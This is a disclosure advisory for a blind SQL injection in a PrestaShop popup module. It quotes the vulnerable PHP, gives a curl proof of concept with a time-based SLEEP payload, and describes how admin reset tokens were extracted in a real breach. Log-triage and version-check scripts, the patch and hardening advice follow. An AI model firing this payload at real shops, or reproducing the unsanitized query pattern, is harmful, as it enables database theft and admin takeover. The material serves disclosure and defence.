CVE-2025-69633 – PrestaShop advancedpopupcreator Module SQL Injection


CVE-2025-69633

Summary

A critical SQL Injection vulnerability has been identified in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop.

The vulnerability allows a remote unauthenticated attacker to execute arbitrary SQL queries via the fromController parameter of the module’s popup controller endpoint.

The issue affects versions:

< 1.2.7

The vendor confirmed that the vulnerability is present at least since version 1.1.26. The exact introduction version has not been determined.

The vulnerability is fixed in:

1.2.7

This vulnerability was observed during incident response investigations and may have been actively exploited in the wild.


Vulnerability Details

  • CVE ID: CVE-2025-69633
  • CWE: CWE-89 – SQL Injection
  • CVSS 3.1: 9.8 (Critical)
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Attack Vector: Remote
  • Authentication Required: No
  • User Interaction: None

Affected Component

/modules/advancedpopupcreator/classes/AdvancedPopup.php

Vulnerable functions:

  • getPopups()
  • updateVisits()

Technical Description

The vulnerability originates from improper handling of the fromController parameter.

Root Cause

In:

controllers/front/popup.php

The parameter is retrieved via:

if ($controller = Tools::getValue('fromController')) {
    return $controller;
}

No sanitization is applied.

The value is later concatenated directly into SQL queries in:

classes/AdvancedPopup.php

Example vulnerable code:

$query .= ' AND (`controller_exceptions` = ""
    OR `controller_exceptions` IS NULL
    OR FIND_IN_SET("' . $controller . '", `controller_exceptions`))';

The $controller variable is not sanitized using pSQL() or any validation mechanism.

This allows injection of arbitrary SQL expressions.


Proof of Concept

Baseline Request (~1 second)

time curl -s -X POST "https://[TARGET]/module/advancedpopupcreator/popup" \
  -d 'updateVisits=1&fromController=index'

SQL Injection Test (~6 seconds)

time curl -s -X POST "https://[TARGET]/module/advancedpopupcreator/popup" \
  -d 'updateVisits=1&fromController=1" AND (SELECT SLEEP(5)) AND "1'

Result

Baseline: ~1.07s  
Injected: ~6.02s

The time-based delay confirms successful blind SQL injection.


Impact

A remote unauthenticated attacker can:

  • Extract sensitive database information
  • Retrieve administrator credentials
  • Extract password reset tokens
  • Discover back-office URLs
  • Fully compromise the PrestaShop administration panel
  • Execute arbitrary SQL queries with the privileges of the underlying database user
  • Cause denial of service

Real-World Exploitation

During forensic investigation of a compromised merchant:

  • Admin email and reset token were extracted from ps_employee
  • Back-office URL retrieved from ps_connection
  • Full administrative compromise achieved
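The forensic findings above come from the database side, so one place to look for traces of this injection is the MySQL general query log, where the popup query arrives with the controller name already embedded. The script below is an added example for this advisory, not tooling from the vendor or the researchers: it assumes the default general_log file layout (timestamp, thread id, command, argument, tab-separated) and that the popup query embeds the controller name as a double-quoted FIND_IN_SET literal, as the advisory's snippet shows. It flags any query where something other than the column argument follows that literal's closing quote, which is exactly what breaking out of the string produces. The table name is a placeholder and the log lines are constructed.

```python
"""Triage of a MySQL general query log for CVE-2025-69633 exploitation traces.

Added example for this advisory, not tooling from the vendor or researchers.
Assumes the default general_log file layout (timestamp, thread id, command,
argument, tab-separated) and that the popup query embeds the controller name
as a double-quoted FIND_IN_SET literal, as the advisory's snippet shows.
The table name below is a placeholder and the log lines are constructed.
"""
import re

LOG_LINE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# Constructed sample: two benign popup lookups and the advisory's PoC payload.
GENERAL_LOG = (
    "2025-12-09T22:14:03.120911Z\t   71 Query\tSELECT * FROM `popup_table` WHERE 1"
    ' AND (`controller_exceptions` = "" OR `controller_exceptions` IS NULL'
    ' OR FIND_IN_SET("index", `controller_exceptions`))\n'
    "2025-12-09T22:14:05.002210Z\t   71 Query\tSELECT * FROM `popup_table` WHERE 1"
    ' AND (`controller_exceptions` = "" OR `controller_exceptions` IS NULL'
    ' OR FIND_IN_SET("product", `controller_exceptions`))\n'
    "2025-12-09T22:14:09.551302Z\t   72 Query\tSELECT * FROM `popup_table` WHERE 1"
    ' AND (`controller_exceptions` = "" OR `controller_exceptions` IS NULL'
    ' OR FIND_IN_SET("1" AND (SELECT SLEEP(5)) AND "1", `controller_exceptions`))\n'
    "2025-12-09T22:14:15.000000Z\t   72 Quit\t\n"
)


def find_in_set_literals(sql):
    """Yield (literal, tail) for every FIND_IN_SET("...") in a query.

    `literal` is the text up to the first unescaped double quote (pSQL()
    escapes quotes as \\", which is honoured here); `tail` is whatever sits
    between that closing quote and the next comma. In a clean query the tail
    is empty because the column argument follows immediately.
    """
    for match in re.finditer(r'FIND_IN_SET\("', sql):
        i = match.end()
        chars = []
        while i < len(sql):
            c = sql[i]
            if c == "\\" and i + 1 < len(sql):
                chars.append(sql[i + 1])
                i += 2
                continue
            if c == '"':
                break
            chars.append(c)
            i += 1
        closing = i
        comma = sql.find(",", closing)
        tail = sql[closing + 1:comma if comma != -1 else len(sql)]
        yield "".join(chars), tail


def triage(log_text):
    """Return one dict per Query entry whose FIND_IN_SET literal was broken out of."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue  # Connect/Quit/Prepare entries carry no SQL of interest
        for literal, tail in find_in_set_literals(m.group("arg")):
            if tail.strip():
                hits.append({
                    "time": m.group("ts"),
                    "thread": int(m.group("thread")),
                    "literal": literal,
                    "injected_tail": tail.strip(),
                })
    return hits


if __name__ == "__main__":
    for hit in triage(GENERAL_LOG):
        print(f"{hit['time']} thread {hit['thread']}: {hit['injected_tail']}")
```

The thread id ties a flagged query back to the Connect entry for the same thread, which records the connecting host and user, and the timestamp can then be matched against the web server's access log for the corresponding POST to /module/advancedpopupcreator/popup.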

Patch

The issue was fixed by sanitizing $controller using pSQL():

- OR FIND_IN_SET("' . $controller . '", `controller_exceptions`))';
+ OR FIND_IN_SET("' . pSQL($controller) . '", `controller_exceptions`))';
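Review bot: pSQL() only escapes the value for use inside the double-quoted string literal, so this fix is correct for this context but has to be repeated at every SQL site (two of them here, at lines ~371 and ~986), and any further query that interpolates $controller stays exposed. Suggest also validating the value once where it is read in controllers/front/popup.php (`if ($controller = Tools::getValue('fromController'))`), rejecting anything outside the letters, digits and underscores a controller name is made of, so the per-query escaping becomes a second layer rather than the only one.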

Applied to:

  • Line ~371
  • Line ~986

Fixed version: 1.2.7
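A local check of whether an installed copy of the module still carries the vulnerable pattern, added here as an example and not code from the advisory, Idnovate or Esokia. It assumes the module directory contains a PrestaShop module config.xml with a <version> element, compares that version with 1.2.7, and scans classes/AdvancedPopup.php for the raw `$controller` concatenation quoted above as opposed to the pSQL() form, so that a manually patched old copy or a regressed new copy is reported correctly. The module trees it writes under a temporary directory are constructed fixtures for the demonstration.

```python
"""Local exposure check for CVE-2025-69633 (added example, not advisory code).

Assumptions: the module ships a PrestaShop-style config.xml with a <version>
element, and the vulnerable and patched code match the two snippets in the
advisory (raw `$controller` versus `pSQL($controller)` inside FIND_IN_SET).
"""
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

FIXED_VERSION = (1, 2, 7)  # advisory: fixed in 1.2.7

# Matches the advisory's vulnerable line: FIND_IN_SET("' . $controller . '"
VULN_PATTERN = re.compile(r"FIND_IN_SET\(\"'\s*\.\s*\$controller\s*\.\s*'\"")


def parse_version(text):
    """'1.2.7' -> (1, 2, 7); tuples compare numerically, unlike strings."""
    return tuple(int(part) for part in text.strip().split("."))


def module_version(module_dir):
    """Read <version> from the module's config.xml (CDATA is handled by ET)."""
    root = ET.parse(Path(module_dir) / "config.xml").getroot()
    return parse_version(root.findtext("version"))


def unsanitized_sites(php_source):
    """1-based line numbers where $controller is concatenated raw into SQL."""
    return [no for no, line in enumerate(php_source.splitlines(), 1)
            if VULN_PATTERN.search(line)]


def assess(module_dir):
    """The source scan is the authoritative signal; the version comparison is
    reported alongside it so the two can be cross-checked."""
    module_dir = Path(module_dir)
    version = module_version(module_dir)
    source = (module_dir / "classes" / "AdvancedPopup.php").read_text()
    sites = unsanitized_sites(source)
    return {
        "version": ".".join(map(str, version)),
        "version_below_fix": version < FIXED_VERSION,
        "unsanitized_sites": sites,
        "vulnerable": bool(sites),
    }


# ---- constructed fixtures for a stand-alone run ---------------------------
CONFIG_XML = """<?xml version="1.0" encoding="UTF-8"?>
<module>
    <name>advancedpopupcreator</name>
    <version><![CDATA[{version}]]></version>
</module>
"""

VULN_PHP = """<?php
$query .= ' AND (`controller_exceptions` = ""
    OR `controller_exceptions` IS NULL
    OR FIND_IN_SET("' . $controller . '", `controller_exceptions`))';
"""
PATCHED_PHP = VULN_PHP.replace("$controller", "pSQL($controller)")


def build_fixture(version, php_source):
    """Write a constructed module tree to a temp dir and return its path."""
    root = Path(tempfile.mkdtemp()) / "advancedpopupcreator"
    (root / "classes").mkdir(parents=True)
    (root / "config.xml").write_text(CONFIG_XML.format(version=version))
    (root / "classes" / "AdvancedPopup.php").write_text(php_source)
    return root


if __name__ == "__main__":
    for ver, php in (("1.2.6", VULN_PHP), ("1.2.7", PATCHED_PHP)):
        print(ver, assess(build_fixture(ver, php)))
```

Point assess() at the real modules/advancedpopupcreator directory of an installation to run it for real; a version below 1.2.7 with no flagged sites means the file was patched by hand and the upgrade is still due, while flagged sites in a version at or above 1.2.7 would indicate a tampered or mismatched copy.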


Additional Security Recommendations

In addition to upgrading to version 1.2.7 or later, we recommend implementing the following security measures:

  • Upgrade or remove the module immediately. If the module is not strictly required, uninstall and delete it entirely.

  • Change the default database prefix (ps_). Replace it with a longer, random and non-guessable prefix to reduce automated exploitation attempts targeting default table names.

  • Monitor third-party module vulnerabilities. Use a security monitoring solution that tracks known vulnerabilities affecting PrestaShop modules (e.g. the free PrestaScan Security module, or Zentria).

  • Enforce strong Back Office authentication controls. Enable Two-Factor Authentication (2FA), preferably TOTP-based, for all Back Office accounts. Make sure that the 2FA module does not store TOTP secret keys in plaintext in the database.

  • Restrict and rotate the Back Office URL. Do not expose the administration URL publicly. If it has been disclosed or indexed, rename and restrict it immediately.

  • Keep PrestaShop core and all modules up to date. Apply security updates as soon as they are released.

  • Deploy perimeter protection. Protect the application with a properly configured Web Application Firewall (WAF) and ensure hosting-level hardening (firewall rules, least-privilege database user, secure file permissions).


Timeline

  • 2025-12-10 – Vulnerability reported responsibly to Idnovate and PrestaShop security
  • 2025-12-10 – Vendor confirms fix released
  • 2025-12-18 – Affected versions confirmed (>= 1.1.26, fixed in 1.2.7)
  • 2025-12-18 – CVE requested from MITRE
  • 2026-01-28 – MITRE assigned CVE-2025-69633
  • 2026-02-02 – Final technical verification prior to publication
  • 2026-02-13 – Publication of the CVE

Vendor acknowledged the vulnerability.


References


Credits

  • Discoverer:
    Esokia (Researcher: Maxime Morel-Bailly)

  • Technical assistance:
    Profileo.com / 772424.com


Acknowledgments

We thank the Idnovate team and the PrestaShop security team for their cooperation and responsiveness.


Disclaimer

This advisory is published for defensive and informational purposes.
Users of affected versions are strongly encouraged to upgrade immediately to version 1.2.7 or later.